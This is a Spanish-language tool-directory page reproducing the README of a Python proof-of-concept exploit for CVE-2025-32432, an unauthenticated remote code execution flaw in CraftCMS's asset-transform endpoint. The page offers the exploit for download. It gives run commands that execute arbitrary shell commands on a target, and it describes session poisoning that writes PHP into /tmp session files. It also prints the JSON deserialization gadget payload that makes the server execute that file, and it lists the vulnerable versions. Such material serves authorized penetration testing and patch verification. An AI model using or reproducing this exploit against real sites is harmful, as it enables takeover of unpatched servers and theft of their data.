Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32432-PoC — Exploit en Python para CVE-2025-32432, una RCE sin autenticación en el endpoint asset-transform de CraftCMS. Incluye una cadena de dos paquetes para ejecutar comandos de shell arbitrarios mediante gadgets de deserialización. | Kitploit
Herramientas/GitHubGitHub/cty-research-1/cve-2025-32432-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubcty-research-1/cve-2025-32432-poc

CVE-2025-32432-PoC

Exploit en Python para CVE-2025-32432, una RCE sin autenticación en el endpoint asset-transform de CraftCMS. Incluye una cadena de dos paquetes para ejecutar comandos de shell arbitrarios mediante gadgets de deserialización.

Ver Repositorio
641hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Scripts de Explotación CVE-2025-32432 (PoC en Python)

Ejecución Remota de Código sin autenticación para CraftCMS 3.x / 4.x / 5.x
Mantenedor del PoC: C.T.Y. (solo uso en investigación)
Descubrimiento de la vulnerabilidad: Nicolas Bourras – Orange Cyberdefense
Inspiración adicional del PoC: Investigación de SensePost y script público de Chirag Artani


1. Resumen

Este repositorio agrupa dos exploits complementarios en Python para CVE-2025-32432 — un RCE sin autenticación en el endpoint de transformación de assets de CraftCMS.

ScriptPropósito
craftcms_rce_php_check.pySonda de seguridad — envía una solicitud usando el gadget FnStream para verificar si se ejecuta PHP arbitrario (muestra la salida de phpinfo()). Ideal para confirmación de bajo impacto.
craftcms_final_payload.pyExploit completo — cadena de dos paquetes: primero implanta PHP vía FnStream, luego aprovecha el gadget FieldLayoutBehavior → PhpManager para ejecutar cualquier comando de shell.

El segundo script es el que se describe a lo largo de este README.
El primer script se incluye para completitud y validación rápida, cortesía de Chirag Artani — ver Créditos.
El nombre del archivo del script se adaptó para mayor claridad; estructura e idea original de Chirag Artani.


2. Descargo de responsabilidad 🚨

Solo para pruebas de seguridad educativas y autorizadas.
Usar estos scripts contra sistemas sin permiso explícito por escrito es ilegal y poco ético.


3. Características (payload final)

  • RCE de un solo disparo con dos paquetes
  • Fuerza bruta automática de assetId (heurística 404 → 302)
  • Ejecución de comandos personalizados (-c/--cmd)
  • Funciona sobre HTTP o HTTPS (se suprimen las advertencias de verificación SSL)
  • Extracción limpia de la salida del comando desde la respuesta HTML

4. Requisitos

  • Python 3.8+
  • Paquetes PyPI (instalar con pip install -r requirements.txt):
    • requests
    • urllib3

5. Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# Instalar dependencias
pip install -r requirements.txt

6. Uso

6.1 Verificación rápida de ejecución PHP

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://victima.com

Si ves la salida de phpinfo(), el objetivo probablemente es explotable.

6.2 Exploit completo de dos paquetes

root@kitploit:~
python3 craftcms_final_payload.py -u https://victima.com -c "id"

Opciones

OpciónForma largaDescripciónRequerido
-u--urlURL base del objetivo (sin barra final)✅
-c--cmdComando de shell a ejecutar✅
-a--assetassetId conocido válido❌
-s--scan-maxLímite de fuerza bruta (por defecto: 300)❌

7. Cómo funciona la vulnerabilidad (resumen)

  • Envenenamiento de sesión — GET a /index.php?p=admin/dashboard&a=<?=...?> escribe PHP arbitrario en /tmp/sess_<ID>.
  • Gadget de deserialización — POST a actions/assets/generate-transform con un gadget FieldLayoutBehavior → PhpManager obliga a CraftCMS a hacer require() del archivo de sesión, ejecutando el código.
root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}

8. Versiones probadas

  • CraftCMS < 3.9.15 (requiere fuerza bruta de assetId)
  • CraftCMS < 4.14.15
  • CraftCMS < 5.6.17

9. Referencias y lecturas adicionales

  • Aviso original — Nicolas Bourras / Orange Cyberdefense
  • Artículo detallado de SensePost
  • PoC de Chirag Artani
  • Aviso de seguridad de CraftCMS
  • CVE-2025-32432 en MITRE

10. Créditos

  • C.T.Y. — PoC completo de dos paquetes y documentación
  • Chirag Artani — Script original de verificación phpinfo (craftcms_rce_php_check.py) e ideas de investigación temprana El nombre del archivo del script se adaptó para mayor claridad; estructura e idea original de Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense — Descubrimiento de la vulnerabilidad y divulgación responsable
  • Información adicional del equipo de investigación de SensePost

11. Licencia

Aviso de responsabilidad: Cualquier riesgo legal o daño que surja del uso de este código es responsabilidad exclusiva del usuario.

Licencia MIT — ver LICENSE.


Instrucciones en español

1. Contenido del proyecto

ArchivoPropósito
craftcms_rce_php_check.pyVerificación de viabilidad de ejecución PHP: Una sola solicitud, usando FnStream para activar phpinfo(), verificando de forma de bajo impacto si el objetivo es vulnerable.
El nombre del archivo se adaptó para mayor claridad; estructura e idea original de Chirag Artani.
craftcms_final_payload.pyExplotación completa de dos paquetes: Primero implanta PHP con FnStream, luego ejecuta comandos arbitrarios a través de PhpManager.

2. Descargo de responsabilidad

Solo para pruebas educativas y autorizadas. El uso no autorizado es ilegal.


3. Verificación rápida

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://objetivo

4. Explotación completa

root@kitploit:~
python3 craftcms_final_payload.py -u https://objetivo -c "id"

Los parámetros son los mismos que en la versión en inglés.


5. Agradecimientos

  • Chirag Artani — Script de verificación phpinfo El nombre del archivo se adaptó para mayor claridad; estructura e idea original de Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense — Descubrimiento de la vulnerabilidad e inspiración técnica
  • SensePost — Inspiración técnica

6. Licencia

El uso de este código conlleva riesgos legales y daños que son responsabilidad exclusiva del usuario.

Licencia MIT

Descargar herramienta